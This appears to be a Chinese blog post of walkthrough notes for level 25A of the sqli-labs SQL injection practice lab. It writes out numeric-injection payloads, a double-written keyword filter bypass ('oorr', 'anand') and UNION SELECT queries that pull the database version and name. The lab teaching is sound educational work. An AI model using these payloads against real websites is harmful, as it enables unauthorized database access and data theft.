sqllab第二十五A关通关笔记

知识点:

  • 数值型注入
  • 双写绕过
    • oorr
    • anand
  • 这里不能用错误注入(固定错误回显信息)
  • 联合注入

测试发现跟25关好像一样,就是过滤了and or # 等东西

构造payload:id=1/0

发现成功运算了,这是一个数值型的注入

构造payload:id=1/0+oorr+1=1--+

成功显示了内容,可以尝试错误注入

构造payload:id=1/0+oorr+exp(710)=1--+

发现没有任何的回显信息,说明这里不能用错误注入

老方法,使用联合注入

构造payload:id=1/0+union+select+1,2,3+--+

成功回显了输入的内容

下面开始进行数据库名和版本的获取

构造payload:id=1/0+union+select+1,version(),database()+--+

成功获取了版本信息和数据库名

同理,可以获取数据库其他内容,这里不演示了,收工

10

相关推荐
dal118网工任子仪3 小时前
66,【6】buuctf web [HarekazeCTF2019]Avatar Uploader 1
笔记·学习
羊小猪~~4 小时前
MYSQL学习笔记(四):多表关系、多表查询(交叉连接、内连接、外连接、自连接)、七种JSONS、集合
数据库·笔记·后端·sql·学习·mysql·考研
milk_yan5 小时前
Docker集成onlyoffice实现预览功能
前端·笔记·docker
东京老树根5 小时前
Excel 技巧15 - 在Excel中抠图头像,换背景色(★★)
笔记·学习·excel
Ronin-Lotus6 小时前
嵌入式硬件篇---ADC模拟-数字转换
笔记·stm32·单片机·嵌入式硬件·学习·低代码·模块测试
UQI-LIUWJ7 小时前
LLM笔记:LayerNorm VS RMSNorm
笔记
东京老树根8 小时前
Excel 技巧17 - 如何计算倒计时,并添加该倒计时的数据条(★)
笔记·学习·excel
m0_7482405410 小时前
AutoSar架构学习笔记
笔记·学习·架构
siy233311 小时前
[c语言日寄]结构体的使用及其拓展
c语言·开发语言·笔记·学习·算法
雾里看山12 小时前
【MySQL】数据库基础知识
数据库·笔记·mysql·oracle